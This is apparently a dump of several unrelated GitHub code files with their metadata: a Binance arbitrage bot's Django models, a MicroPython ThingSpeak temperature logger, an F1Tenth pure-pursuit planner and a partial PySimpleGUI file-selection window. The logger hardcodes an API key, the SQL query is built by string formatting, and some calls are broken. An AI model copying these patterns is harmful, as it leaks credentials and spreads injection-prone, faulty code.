REQUIRED_FIELDS = []\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Send an email to this user.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n \n def get_binance_client(self):\n if self.api_key and self.api_secret_key:\n return Client(self.api_key, self.api_secret_key)\n else:\n return None\n \n @property\n def balances(self):\n return [asset for asset in self.get_binance_client().get_account().get('balances') if float(asset.get(\"free\")) > 0 or float(asset.get(\"locked\")) > 0]\n\n @property\n def base_currencies(self):\n ret = []\n if self.do_btc:\n ret.append('BTC')\n if self.do_eth:\n ret.append('ETH')\n if self.do_usdt:\n ret.append('USDT')\n if self.do_bnb:\n ret.append('BNB')\n return ret\n\n @property\n def username(self):\n \"\"\"username属性のゲッター\n\n 他アプリケーションが、username属性にアクセスした場合に備えて定義\n メールアドレスを返す\n \"\"\"\n return self.email\n @property\n def active_scenario_count(self):\n return len([osr for osr in OrderSequenceResult.objects.filter(user__id = self.id) if osr.in_progress])\n\n'''\n 取引可能な通貨ペアのマスタ情報\n'''\nclass Symbol(models.Model):\n class Meta:\n verbose_name = 'シンボル'\n verbose_name_plural = 'シンボル'\n\n def __str__(self):\n return '{symbol} {side}'.format(symbol = self.symbol, side = self.side)\n \n symbol = models.CharField(\n verbose_name = '通貨',\n max_length = 20\n )\n \n from_currency = models.CharField(\n verbose_name = '元通貨',\n max_length = 10\n )\n to_currency = models.CharField(\n verbose_name = '取得通貨',\n max_length = 10\n )\n \n side = models.CharField(\n verbose_name = 'サイド',\n max_length = 10\n )\n @property\n def is_sell(self):\n return self.side == SIDE_SELL\n def 
get_ticker(self):\n result = Client(None, None).get_ticker(symbol = self.symbol)\n # 売りの場合\n if self.side == SIDE_SELL:\n price = result.get('bidPrice')\n else:\n price = result.get('askPrice')\n return float(price)\n @staticmethod\n def get_scenario_patterns(client, currency = None):\n sql = ''\n sql += 'select'\n sql += ' t1.id as id,'\n sql += ' t1.id as t1_id, '\n sql += ' t2.id as t2_id, '\n sql += ' t3.id as t3_id '\n sql += 'from core_symbol as t1 '\n sql += 'inner join core_symbol as t2 '\n sql += ' on t1.to_currency = t2.from_currency '\n sql += 'inner join core_symbol as t3 '\n sql += ' on t2.to_currency = t3.from_currency '\n sql += 'where t1.from_currency = t3.to_currency '\n if currency:\n sql += \"and t1.from_currency = '{currency}';\".format(currency = currency)\n return Symbol.objects.raw(sql)\n\nclass OrderSequence(models.Model):\n class Meta:\n verbose_name = '注文シナリオ'\n verbose_name_plural = '注文シナリオ'\n\n def __str__(self):\n return '{t1_symbol} - {t2_symbol} - {t3_symbol}'.format(t1_symbol = self.t1_symbol, t2_symbol = self.t2_symbol, t3_symbol = self.t3_symbol)\n \n t1 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't1',\n related_name = 'myseq_t1',\n on_delete = models.CASCADE\n )\n t2 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't2',\n related_name = 'myseq_t2',\n on_delete = models.CASCADE\n )\n t3 = models.ForeignKey(\n to = Symbol,\n verbose_name = 't3',\n related_name = 'myseq_t3',\n on_delete = models.CASCADE\n )\n @property\n def t1_symbol(self):\n return self.t1.symbol\n @property\n def t2_symbol(self):\n return self.t2.symbol\n @property\n def t3_symbol(self):\n return self.t3.symbol\n @property\n def t1_side(self):\n return self.t1.side\n @property\n def t2_side(self):\n return self.t2.side\n @property\n def t3_side(self):\n return self.t3.side\n @property\n def transition(self):\n return '{c1}-{c2}-{c3}-{c4}'.format(c1 = self.t1.from_currency, c2 = self.t1.to_currency, c3 = self.t2.to_currency, c4 = self.t3.to_currency)\n\n\nclass Order(models.Model):\n class Meta:\n verbose_name = '注文'\n verbose_name_plural = '注文'\n def __str__(self):\n return str(self.order_id)\n\n user = models.ForeignKey(\n to = User,\n verbose_name = 'ユーザ',\n on_delete = models.CASCADE\n )\n symbol = models.ForeignKey(\n to = Symbol,\n verbose_name = 'シンボル',\n on_delete = models.CASCADE\n )\n order_id = models.IntegerField(\n verbose_name = 'orderId',\n null = True\n )\n quantity = models.FloatField(\n verbose_name = 'base_数量'\n )\n price = models.FloatField(\n verbose_name = '価格'\n )\n time = UnixTimeStampField(default=0.0)\n \n status = models.CharField(\n verbose_name = 'ステータス',\n max_length = 100,\n null = True\n )\n error_message = models.CharField(\n verbose_name = 'エラーメッセージ',\n null = True,\n blank = True,\n max_length = 100\n )\n @property\n def quote_quantity(self):\n return self.quantity * self.price\n\n @property\n def safe_price(self):\n from decimal import Decimal, ROUND_DOWN\n return \"{0:.8f}\".format(Decimal(self.price))\n \n\n @property\n def is_open(self):\n return self.status in { ORDER_STATUS_NEW, ORDER_STATUS_PARTIALLY_FILLED }\n @property\n def currecy_acquired(self):\n return self.symbol.to_currency\n\n @property\n def amount_acquired(self):\n if self.side == SIDE_SELL:\n return (self.quote_quantity or 0) * (1 - self.user.commission_rate / 100)\n else:\n return self.quantity * (1 - self.user.commission_rate / 100)\n\n @property\n def currency_paid(self):\n return self.symbol.from_currency\n\n @property\n def amount_paid(self):\n if self.side == 
SIDE_SELL:\n return self.quantity\n else:\n return (self.quote_quantity or 0)\n \n @property\n def actual_rate(self):\n val = self.quote_quantity / self.quantity\n prc = \"{:.\"+str(8)+\"f}\" #first cast decimal as str\n return prc.format(val)\n\n @property\n def str_symbol(self):\n return self.symbol.symbol\n \n @property\n def side(self):\n return self.symbol.side\n\n def place(self):\n client = self.user.get_binance_client()\n try:\n if self.side == SIDE_SELL:\n result = client.order_limit_sell(\n symbol=self.str_symbol,\n quantity=self.quantity,\n price=self.safe_price\n )\n else:\n result = client.order_limit_buy(\n symbol=self.str_symbol,\n quantity=self.quantity,\n price=self.safe_price\n )\n except Exception as e:\n self.status = ORDER_STATUS_REJECTED\n self.error_message = str(e)\n self.save()\n print('{symbol}/qty:{quantity}/price:{price}の注文に失敗:{err}'.format(symbol = self.str_symbol, quantity = self.quatity, price = self.safe_price, err =str(e)))\n \n else:\n self.order_id = result.get('orderId')\n self.time = result.get('transactTime') / 1000\n self.status = result.get('status')\n self.save()\n return self.status != ORDER_STATUS_REJECTED\n def cancel(self):\n if not self.status:\n self.status = ORDER_STATUS_CANCELED\n client = self.user.get_binance_client()\n try:\n result = client.cancel_order(\n symbol=self.str_symbol,\n orderId=self.order_id\n )\n except Exception as e:\n print('{order_id}のキャンセルに失敗:{err}'.format(order_id = self.order_id, err =str(e)))\n else:\n self.time = result.get('transactTime') / 1000\n self.status = result.get('status')\n self.save()\n\n def update_status(self):\n if not self.order_id:\n return False\n client = self.user.get_binance_client()\n try:\n result = client.get_order(\n symbol=self.str_symbol,\n orderId=self.order_id\n )\n except Exception as e:\n print('{order_id}の更新に失敗:{err}'.format(order_id = self.order_id, err = str(e)))\n else:\n self.status = result.get('status')\n self.save() \n\nclass OrderSequenceResult(models.Model):\n class Meta:\n verbose_name = 'シナリオ実行結果'\n verbose_name_plural = 'シナリオ実行結果'\n \n def __str__(self):\n return '利益 : {}'.format(self.profit)\n\n user = models.ForeignKey(\n to = User,\n verbose_name = 'ユーザ',\n on_delete = models.CASCADE\n )\n master = models.ForeignKey(\n to = OrderSequence,\n on_delete = models.CASCADE\n )\n t1_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t1'\n )\n t2_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t2'\n )\n t3_result = models.ForeignKey(\n to = Order,\n on_delete = models.CASCADE,\n related_name = 'seq_t3'\n )\n\n @property\n def profit(self):\n return self.t3_result.amount_acquired - self.t1_result.amount_paid\n\n @property\n def time(self):\n return self.t3_result.time\n \n @property\n def in_progress(self):\n if self.t1_result.is_open or not self.t1_result.status:\n return True\n if self.t2_result.is_open or not self.t2_result.status:\n return True\n if self.t3_result.is_open or not self.t3_result.status:\n return True\n return False\n @property\n def is_completed(self):\n return (self.t1_result.status == ORDER_STATUS_FILLED) \\\n and (self.t2_result.status == ORDER_STATUS_FILLED) \\\n and (self.t3_result.status == ORDER_STATUS_FILLED)\n \nclass Scenario(object):\n def __init__(self, orderseq, user):\n self.user = user\n self.orderseq = orderseq\n self.client = self.user.get_binance_client()\n self.is_valid = True\n self.result = None\n if not self.client:\n self.is_valid = False\n 
self.error_message = 'APIキーが登録されていません'\n \n def get_entry(self, symbol, num):\n result = self.client.get_order_book(symbol = symbol.symbol)\n entry_array = result.get('asks' if symbol.side == SIDE_SELL else 'bids')\n if len(entry_array) < num:\n self.is_valid = False\n self.error_message = '板に{}エントリがありません'.format('買' if symbol.side == SIDE_SELL else '売')\n else:\n return [float(o) for o in entry_array[num - 1]] \n \n def get_order_amount(self, t1_rate, t2_rate, t3_rate):\n pass\n # t1_target_entry = self.get_entry(self.orderseq.t1, 2)\n # t1_rate = orderseq.t1.get_ticker()\n\n # t2_target_entry = _get_2nd_entry(client, orderseq.t2)\n # t2_rate = orderseq.t2.get_ticker()\n \n # t3_target_entry = _get_2nd_entry(client, orderseq.t3)\n # t3_rate = orderseq.t3.get_ticker()\n \n # ## A → B → C → Aとする\n # t1_A_amount = t1_target_entry[1] if orderseq.t1.is_sell else (t1_target_entry[1] * t1_rate)\n # t2_B_amount = t2_target_entry[1] if orderseq.t2.is_sell else (t2_target_entry[1] * t2_rate)\n # t2_A_amount = (t2_B_amount / t1_rate) if orderseq.t1.is_sell else (t2_B_amount * t1_rate)\n # t3_A_amount = (t3_target_entry[1] * t3_rate) if orderseq.t3.is_sell else t3_target_entry[1]\n \n # A_order_amount = 0\n\n # if t1_A_amount >= t2_A_amount:\n # if t2_A_amount >= t3_A_amount:\n # A_order_amount = t3_A_amount\n # else:\n # A_order_amount = t2_A_amount\n # else:\n # if t1_A_amount >= t3_A_amount:\n # A_order_amount = t3_A_amount\n # else:\n # A_order_amount = t1_A_amount\n \n # return A_order_amount\n @staticmethod\n def round_by_step(a, MinClip):\n return math.floor(float(a) / MinClip) * MinClip\n @staticmethod\n def floating_decimals(amount, precision):\n # prc = \"{:.\"+str(dec)+\"f}\" #first cast decimal as str\n # return prc.format(f_val)\n return float(\"{:0.0{}f}\".format(amount, precision))\n @staticmethod\n def get_valid_amount(symbol_info, amount):\n precision = symbol_info.get('baseAssetPrecision')\n step = float([f for f in symbol_info.get('filters') if f.get('filterType') == 'LOT_SIZE'][0].get('stepSize'))\n return Scenario.floating_decimals(Scenario.round_by_step(amount, step), precision)\n @staticmethod\n def violate_min_notional(symbol_info, side, rate, amount):\n min_notional = float([f for f in symbol_info.get('filters') if f.get('filterType') == 'MIN_NOTIONAL'][0].get('minNotional'))\n notional = rate * amount\n if notional < min_notional:\n print('min notional:{mn}に対し{n}で発注しようとしています symbol:{symbol}, side:{side}, amount:{amount}, rate:{rate} '.format(mn = min_notional, n = notional, symbol = symbol_info.get('symbol'), side = side, amount = amount, rate = rate))\n return notional < min_notional\n\n def get_order_unit_amount(self):\n base_currency = self.orderseq.t1.from_currency.lower()\n return getattr(self.user, '{}_unit_amount'.format(base_currency))\n \n def estimate(self):\n if not self.is_valid:\n return False\n n = 1\n\n commission_rate = self.user.commission_rate\n\n try:\n t1_price = self.get_entry(self.orderseq.t1, n)[0]\n t2_price = self.get_entry(self.orderseq.t2, n)[0]\n t3_price = self.get_entry(self.orderseq.t3, n)[0]\n except TypeError:\n return False\n\n # 現在の所有分を確認\n balance = float(self.client.get_asset_balance(asset = self.orderseq.t1.from_currency).get('free'))\n unit = self.get_order_unit_amount()\n\n if unit > balance:\n self.is_valid = False\n self.error_message = '注文しようとする数量を持ち合わせておりません: 期待={unit}, 所有={free}'.format(unit = unit, free = balance)\n return None\n\n t1_amount_temp = unit if self.orderseq.t1.is_sell else (unit / t1_price)\n t1_symbol_info = 
self.client.get_symbol_info(symbol = self.orderseq.t1.symbol)\n t1_amount = Scenario.get_valid_amount(t1_symbol_info, t1_amount_temp)\n \n if self.orderseq.t1.is_sell:\n initial_cost = t1_amount\n else:\n initial_cost = t1_amount * t1_price\n \n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t1_symbol_info, self.orderseq.t1.side, t1_price, t1_amount):\n self.is_valid = False\n self.error_message = 't1の注文数量が不正です'\n return None\n\n b_acquired = (t1_amount * t1_price) if self.orderseq.t1.is_sell else t1_amount\n b_acquired *= ((100 - commission_rate) / 100)\n \n self.t1_info = {\n 'symbol': self.orderseq.t1.symbol,\n 'quantity': t1_amount,\n 'rate': t1_price,\n 'side': self.orderseq.t1.side,\n 'currency_acquired': self.orderseq.t1.to_currency,\n 'amount_acquired': b_acquired,\n 'symbol_info': t1_symbol_info\n }\n \n # t2 取引\n t2_symbol_info = self.client.get_symbol_info(symbol = self.orderseq.t2.symbol)\n t2_amount_temp = b_acquired if self.orderseq.t2.is_sell else (b_acquired / t2_price)\n t2_amount = Scenario.get_valid_amount(t2_symbol_info, t2_amount_temp)\n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t2_symbol_info, self.orderseq.t2.side, t2_price, t2_amount):\n self.is_valid = False\n self.error_message = 't2の注文数量が不正です'\n return None\n c_acquired = (t2_amount * t2_price) if self.orderseq.t2.is_sell else t2_amount\n c_acquired *= ((100 - commission_rate) / 100)\n \n self.t2_info = {\n 'symbol': self.orderseq.t2.symbol,\n 'quantity': t2_amount,\n 'rate': t2_price,\n 'side': self.orderseq.t2.side,\n 'currency_acquired': self.orderseq.t2.to_currency,\n 'amount_acquired': c_acquired,\n 'symbol_info': t2_symbol_info\n }\n\n ''' t3取引 '''\n t3_symbol_info = self.client.get_symbol_info(symbol = self.orderseq.t3.symbol)\n t3_amount_temp = c_acquired if self.orderseq.t3.is_sell else (c_acquired / t3_price)\n t3_amount = Scenario.get_valid_amount(t3_symbol_info, t3_amount_temp)\n # 注文数量が正しいかどうか確認\n if Scenario.violate_min_notional(t3_symbol_info, self.orderseq.t3.side, t3_price, t3_amount):\n self.is_valid = False\n self.error_message = 't3の注文数量が不正です'\n return None\n\n #a_acquired_ret = (c_acquired * t3_price) if self.orderseq.t3.is_sell else (c_acquired / t3_price)\n a_acquired = t3_amount * t3_price if self.orderseq.t3.is_sell else t3_amount\n a_acquired *= ((100 - commission_rate) / 100)\n \n self.t3_info = {\n 'symbol': self.orderseq.t3.symbol,\n 'quantity': t3_amount,\n 'rate': t3_price,\n 'side': self.orderseq.t3.side,\n 'currency_acquired': self.orderseq.t3.to_currency,\n 'amount_acquired': a_acquired,\n 'symbol_info': t3_symbol_info\n }\n \n self.profit = Scenario.floating_decimals(a_acquired - initial_cost, 8)\n self.profit_rate = Scenario.floating_decimals(self.profit / initial_cost * 100, 3)\n \n def execute(self):\n t1_obj = Order()\n t1_obj.user = self.user\n t1_obj.symbol = self.orderseq.t1\n t1_obj.quantity = self.t1_info.get('quantity')\n t1_obj.price = self.t1_info.get('rate')\n \n t1_obj.save()\n \n # 注文が拒否もしくは期限切れした場合\n if t1_obj.status in { ORDER_STATUS_REJECTED, ORDER_STATUS_EXPIRED }:\n self.is_valid = False\n self.error_message = '注文が失敗しました {}'.format(t1_obj.error_message)\n return\n time.sleep(1)\n \n # t2実行\n t2_obj = Order()\n t2_obj.user = self.user\n t2_obj.symbol = self.orderseq.t2\n t2_obj.quantity = self.t2_info.get('quantity')\n t2_obj.price = self.t2_info.get('rate')\n t2_obj.save()\n\n t3_obj = Order()\n t3_obj.user = self.user\n t3_obj.symbol = self.orderseq.t3\n t3_obj.quantity = self.t3_info.get('quantity')\n t3_obj.price = self.t3_info.get('rate')\n 
t3_obj.save()\n\n osr = OrderSequenceResult()\n osr.user = self.user\n osr.master = self.orderseq\n osr.t1_result = t1_obj\n osr.t2_result = t2_obj\n osr.t3_result = t3_obj\n osr.save()\n self.result = osr","repo_name":"shusaku-ishikawa/binance","sub_path":"backend/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":23873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26189533615","text":"# ************************************** \r\nfrom machine import Pin\r\nimport machine \r\nimport network \r\nimport comptes_wifi \r\nimport urequests\r\nimport time\r\nimport onewire\r\nimport ds18x20\r\n# **************************************\r\n\r\n# ************Affichage Erreur **********\r\nLed_builtin = Pin('LED',Pin.OUT)# RP2 W ou 25 pour RP2\r\nLed_builtin.off()\r\n \r\ndef affichage_erreur(code) : # 1 wifi, 2 capteur 3 http \r\n if code == 1 : \r\n while True:\r\n Led_builtin.toggle() #changement état\r\n time.sleep_ms(500)\r\n if code == 2 : \r\n while True:\r\n Led_builtin.toggle() #changement état\r\n time.sleep_ms(50)\r\n if code == 3 : \r\n while True:\r\n Led_builtin.on() #ON \r\n time.sleep(10) \r\n# **************************************\r\n\r\n\r\n# **********connexion wifi**************\r\nssid = comptes_wifi.ssid\r\npassword = comptes_wifi.password\r\n\r\ndef connexion_wifi_STA(pssid,ppassword) : # Connexion wifi mode STATION\r\n wlan = network.WLAN(network.STA_IF)\r\n wlan.active(True)\r\n wlan.connect(pssid, ppassword)\r\n\r\n # Wait for connect or fail\r\n max_wait = 10\r\n while max_wait > 0:\r\n if wlan.status() < 0 or wlan.status() >= 3:\r\n break\r\n max_wait -= 1\r\n print('waiting for connection...')\r\n time.sleep(1)\r\n\r\n # Handle connection error\r\n if wlan.status() != 3:\r\n affichage_erreur(1)\r\n #raise RuntimeError('network connection failed')\r\n else:\r\n print('connected')\r\n status = wlan.ifconfig()\r\n print( 'ip = ' + status[0] )\r\n Led_builtin.on()\r\n time.sleep(3)\r\n Led_builtin.off()\r\n# **************************************\r\n\r\n# **********mesure capteur DS18x20******\r\now = onewire.OneWire(Pin(15))\r\nds = ds18x20.DS18X20(ow)\r\nadresse_capteur1 = bytearray(b'(\\xfefffra\\x81\\x17\\x04*')\r\n\r\ndef mesure_capteur(adresse_capteur1) :\r\n try :\r\n ds.convert_temp()\r\n time.sleep_ms(750)\r\n temperature =ds.read_temp(adresse_capteur1)\r\n temperature = int(temperature)\r\n print('La température actuelle est de : ',temperature)\r\n return temperature\r\n except :\r\n affichage_erreur(2)\r\n# **************************************\r\n\r\n# *********Connexion ThingSpeak*****************************\r\nchamp = 'field1' #salon\r\ndef send_temperature_ThingSpeak(temperature) :\r\n data_capteur = str(temperature)\r\n try : \r\n print('https://api.thingspeak.com/update?api_key=94E2Q0HA89TJVJH4&{}={}'.format(champ,data_capteur))\r\n request = urequests.get('https://api.thingspeak.com/update?api_key=94E2Q0HA89TJVJH4&{}={}'.format(champ,data_capteur))\r\n request.close()\r\n print('données envoyées')\r\n except :\r\n print(\"Pb d'envoi\")\r\n affichage_erreur(3)\r\n# **************************************\r\n\r\n\r\n# *************main*************************\r\nwhile True : \r\n print(\"lancement de l'application\")\r\n print(\"Connexion wifi\")\r\n connexion_wifi_STA(ssid,password)\r\n print(\"Mesure capteur\")\r\n temperature = mesure_capteur()\r\n print(temperature)\r\n print(\"Envoi donnée ThingSpeak\")\r\n send_temperature_ThingSpeak(temperature)\r\n print('mise 
en sommeil légé') #RP2 ne permet pas le sommeil profond\r\n time.sleep(3) #temps d'affichage avant mise en sommeil\r\n machine.lightsleep(3600000) #1 heure\r\n# ****************************************\r\n\r\n\r\n\r\n \r\n","repo_name":"christianDUCROS/ThingSpeak","sub_path":"monitoring_thingspeak__capteur_micropython.py","file_name":"monitoring_thingspeak__capteur_micropython.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75192251881","text":"\"\"\"\nPartial code source: https://github.com/f1tenth/f1tenth_gym\nExample waypoint_follow.py from f1tenth_gym\nSpecific function used:\n- nearest_point_on_trajectory_py2\n- first_point_on_trajectory_intersecting_circle\n- get_actuation\n\nAdjustments have been made\n\n\"\"\"\n\nimport numpy as np\nfrom F1TenthRacingDRL.Utils.utils import init_file_struct, calculate_speed\nfrom numba import njit\nimport csv\nimport os\nfrom matplotlib import pyplot as plt\nfrom F1TenthRacingDRL.Planners.TrackLine import TrackLine\nfrom F1TenthRacingDRL.Planners.VehicleStateHistory import VehicleStateHistory\n\n\n\nclass PurePursuit:\n def __init__(self, conf, run, init=True):\n self.name = run.run_name\n path = os.getcwd() + f\"/Data/\" + run.path + self.name + \"/\"\n if not os.path.exists(path):\n os.mkdir(path)\n elif init:\n init_file_struct(path)\n \n self.conf = conf\n self.run = run\n\n self.racing_line = run.racing_line\n self.speed_mode = run.pp_speed_mode\n self.max_speed = run.max_speed\n self.track_line = TrackLine(run.map_name, run.racing_line, False)\n # self.track_line = TrackLine(run.map_name, run.racing_line, True)\n # self.lookahead = run.lookahead\n\n self.v_min_plan = conf.v_min_plan\n self.wheelbase = conf.l_f + conf.l_r\n self.max_steer = conf.max_steer\n \n self.vehicle_state_history = VehicleStateHistory(run, f\"Testing{run.map_name.upper()}/\")\n\n self.counter = 0\n\n def plan(self, obs):\n position = np.array([obs['poses_x'][0], obs['poses_y'][0]])\n theta = obs['poses_theta'][0]\n # lookahead = 1.9\n # lookahead = 1.5\n # r_speed = self.track_line.get_raceline_speed(position)\n # lookahead = 0.4 + 0.18 * r_speed \n # lookahead = 0.3 + 0.15 * r_speed \n lookahead = 0.4 + 0.16 * obs['linear_vels_x'][0] \n # lookahead = 0.3 + 0.19* obs['linear_vels_x'][0] \n # lookahead = 0.7 + 1* obs['linear_vels_x'][0] / 8\n # lookahead = 0.9 + 0.6 * obs['linear_vels_x'][0] / 8\n # lookahead = self.lookahead\n lookahead_point = self.track_line.get_lookahead_point(position, lookahead)\n\n if obs['linear_vels_x'][0] < self.v_min_plan:\n return np.array([0.0, 4])\n\n speed_raceline, steering_angle = get_actuation(theta, lookahead_point, position, lookahead, self.wheelbase)\n steering_angle = np.clip(steering_angle, -self.max_steer, self.max_steer)\n if self.speed_mode == 'constant':\n speed = 2\n elif self.speed_mode == 'link':\n speed = calculate_speed(steering_angle, 0.8, 7)\n elif self.speed_mode == 'racing_line':\n speed = speed_raceline \n else:\n raise Exception(f\"Invalid speed mode: {self.speed_mode}\")\n \n # speed = speed * 0.97\n speed = min(speed, self.max_speed) # cap the speed\n\n action = np.array([steering_angle, speed])\n \n self.vehicle_state_history.add_memory_entry(obs, action)\n\n return action\n\n def done_callback(self, final_obs):\n self.vehicle_state_history.add_memory_entry(final_obs, np.array([0, 0]))\n self.vehicle_state_history.save_history()\n \n progress = 
self.track_line.calculate_progress_percent([final_obs['poses_x'][0], final_obs['poses_y'][0]]) * 100\n \n print(f\"Test lap complete --> Time: {final_obs['lap_times'][0]:.2f}, Colission: {bool(final_obs['collisions'][0])}, Lap p: {progress:.1f}%\")\n\n\n\n@njit(fastmath=False, cache=True)\ndef get_actuation(pose_theta, lookahead_point, position, lookahead_distance, wheelbase):\n waypoint_y = np.dot(np.array([np.sin(-pose_theta), np.cos(-pose_theta)]), lookahead_point[0:2]-position)\n speed = lookahead_point[2]\n if np.abs(waypoint_y) < 1e-6:\n return speed, 0.\n radius = 1/(2.0*waypoint_y/lookahead_distance**2)\n steering_angle = np.arctan(wheelbase/radius)\n return speed, steering_angle\n\n","repo_name":"BDEvan5/F1TenthRacingDRL","sub_path":"F1TenthRacingDRL/Planners/PurePursuit.py","file_name":"PurePursuit.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"10527275092","text":"# -*- coding: utf-8 -*-\r\nimport PySimpleGUI as sg\r\nimport Projet2\r\nimport fenetreComparaison\r\nimport re\r\n\r\n#Création d'une fenêtre de choix d'un fichier de comparaison\r\ndef createComparisonFileSelect(results) :\r\n #Variables globales\r\n _VARS = {'window': False}\r\n\r\n numberOfRows = len(results[2]) if isinstance(results[2] , list) else 1\r\n \r\n dataFilePath = \"\"\r\n entete = 2\r\n lignesDonnees = 20\r\n colonneDebit = \"G,I,K,M,O\"\r\n colonneAmont =\"H,J,L,N,P\"\r\n \r\n #Fonction permetttant seulement l'entrée d'un entier dans un champ texte\r\n def UpdateInputInt(event, values, forceZero = False):\r\n global entete\r\n global lignesDonnees\r\n \r\n inputValue = _VARS['window'][event]\r\n previousValue = inputValue.metadata\r\n \r\n #Si le champ est désactivé la saisie est ignorée\r\n if inputValue.Widget[\"state\"] == \"readonly\":\r\n return\r\n \r\n if values[event] != \"\" :\r\n try :\r\n #Vérifier si la conversion est possible\r\n newValue = str(int(values[event]))\r\n \r\n #Éviter de devoir supprimer le 0, suppression auto\r\n if previousValue == \"0\" and newValue != \"0\":\r\n newValue = newValue.replace(\"0\",\"\")\r\n \r\n #Mise à jour des valeurs du champs et des variables associées\r\n inputValue.metadata = newValue\r\n inputValue.Update(newValue)\r\n if event == \"-ENTETE-\" :\r\n entete = int(newValue)\r\n elif event == \"-LIGNESDONNEES-\" :\r\n lignesDonnees = int(newValue)\r\n \r\n except :\r\n #Si ce n'est pas un entier, on ignore la saisie en recopiant la dernière valeur enregistrée\r\n values[event] = previousValue\r\n inputValue.Update(values[event])\r\n else :\r\n #Ne pas autoriser la valeur \"\"\r\n if forceZero :\r\n inputValue.metadata = \"0\"\r\n if event == \"-ENTETE-\" :\r\n entete = 0\r\n elif event == \"-LIGNESDONNEES-\" :\r\n lignesDonnees = 0\r\n inputValue.Update(0)\r\n else : \r\n inputValue.metadata = \"\" \r\n \r\n #Fonction permetttant seulement l'entrée de colonnes (Lettres, \",\" et \" \")\r\n def UpdateInputColumn(event, values):\r\n global colonneDebit\r\n global colonneAmont\r\n \r\n inputValue = _VARS['window'][event]\r\n previousValue = inputValue.metadata\r\n \r\n #Si le champ est désactivé la saisie est ignorée\r\n if inputValue.Widget[\"state\"] == \"readonly\":\r\n return\r\n \r\n if values[event] != \"\" :\r\n \r\n #Vérifier que la valeur est une lettre\r\n if not re.search('[^a-zA-Z, ]', values[event]) :\r\n #Mise en forme en majuscule\r\n newValue = values[event].upper().replace(\" \",\"\")\r\n \r\n #Mise à jour des valeurs du champs et 
des variables associées\r\n inputValue.metadata = newValue\r\n inputValue.Update(newValue)\r\n if event == \"-COLONNEDEBIT-\" :\r\n colonneDebit = newValue\r\n elif event == \"-COLONNEAMONT-\" :\r\n colonneAmont = newValue\r\n \r\n else :\r\n #Si ce n'est pas une lettre, on ignore la saisie en recopiant la dernière valeur enregistrée\r\n values[event] = previousValue\r\n inputValue.Update(values[event])\r\n else :\r\n inputValue.metadata = \"\" \r\n \r\n \r\n ####################################################################################################################################\r\n ###LAYOUT\r\n ####################################################################################################################################\r\n \r\n #Layout générale de la fenêtre\r\n layout = [\r\n [sg.Text(\"Fichier de données : \"),\r\n sg.In(dataFilePath, size=(25, 1), enable_events=True, key=\"-DATAFILE-\", disabled = True, readonly= True),\r\n sg.FileBrowse('Parcourir')],\r\n \r\n [sg.Text(\"Nombre de lignes d'en-tête\"), sg.Push(),\r\n sg.InputText(str(entete), size =(4,1), key ='-ENTETE-', enable_events=True, metadata = str(entete))],\r\n \r\n [sg.Text(\"Colonnes des débits\"), sg.Push(),\r\n sg.InputText(colonneDebit, size =(10,1), key ='-COLONNEDEBIT-', enable_events=True, metadata = colonneDebit)],\r\n \r\n [sg.Text(\"Colonnes des puissances\"), sg.Push(),\r\n sg.InputText(colonneAmont, size =(10,1), key ='-COLONNEAMONT-', enable_events=True, metadata = colonneAmont),\r\n ],\r\n [sg.Push(),\r\n sg.Button(button_text=\"Comparer\", size=(25, 3), key=\"-COMPAREBUTTON-\", disabled= True, tooltip = \"Saisir un fichier de comparaison\"),\r\n sg.Push()\r\n ],\r\n ]\r\n \r\n \r\n #Création de la fenêtre\r\n _VARS['window'] = sg.Window('Fichier de comparaison',\r\n layout,\r\n finalize=True,\r\n resizable=False,\r\n \r\n element_justification=\"left\")\r\n \r\n \r\n ####################################################################################################################################\r\n ###WINDOW LIFE\r\n ####################################################################################################################################\r\n \r\n \r\n \r\n \r\n while True:\r\n event, values = _VARS['window'].read(timeout=200)\r\n if event == sg.WIN_CLOSED or event == 'Exit':\r\n break\r\n elif \"COLONNE\" in event :\r\n #Une modification de la valeur dans les champs de colonnes\r\n UpdateInputColumn(event, values)\r\n elif event == \"-ENTETE-\" :\r\n #Une modification de la valeur dans le champs du nombre de lignes d'entete\r\n UpdateInputInt(event, values, True)\r\n elif event == \"-LIGNESDONNEES-\" :\r\n #Une modification de la valeur dans le champs du nombre de lignes de données dans le fichier\r\n UpdateInputInt(event, values, True)\r\n elif event == \"-DATAFILE-\":\r\n #Une modification de la valeur dans la selection d'un fichier de données\r\n if not values[\"-DATAFILE-\"] ==\"\" :\r\n _VARS['window'][\"-COMPAREBUTTON-\"].update(disabled=False)\r\n _VARS['window'][\"-COMPAREBUTTON-\"].SetTooltip(None)\r\n dataFilePath = values[\"-DATAFILE-\"]\r\n elif event == \"-COMPAREBUTTON-\":\r\n #Un appui sur le bouton de comparaison\r\n try :\r\n #Lecture des valeurs\r\n original_data_debits = Projet2.readExcelValues(entete, numberOfRows, colonneDebit, \"\", dataFilePath)\r\n original_data_puissances = Projet2.readExcelValues(entete, numberOfRows, colonneAmont, \"\", dataFilePath)\r\n #Céation de la fenetre d'affichage des résultats\r\n 
